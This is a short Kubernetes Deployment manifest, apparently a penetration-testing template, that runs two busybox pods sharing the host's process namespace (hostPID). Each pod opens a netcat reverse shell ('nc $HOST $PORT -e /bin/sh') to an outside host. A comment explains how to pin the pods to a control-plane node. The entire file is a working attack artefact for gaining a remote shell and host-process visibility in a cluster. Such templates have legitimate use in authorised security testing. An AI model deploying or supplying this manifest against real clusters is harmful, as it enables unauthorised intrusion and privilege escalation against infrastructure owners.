apiVersion: apps/v1
kind: Deployment
metadata:
  name: hostpid-revshell-deployment
  labels:
    app: pentest
    type: deployment
spec:
  replicas: 2
  selector:
    matchLabels:
      app: pentest
      type: deployment
  template:
    metadata:
      labels:
        app: pentest
        type: deployment
    spec:
      hostPID: true
      containers:
      - name: hostpid-revshell-deployment
        image: busybox
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "nc $HOST $PORT  -e /bin/sh;" ]
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
      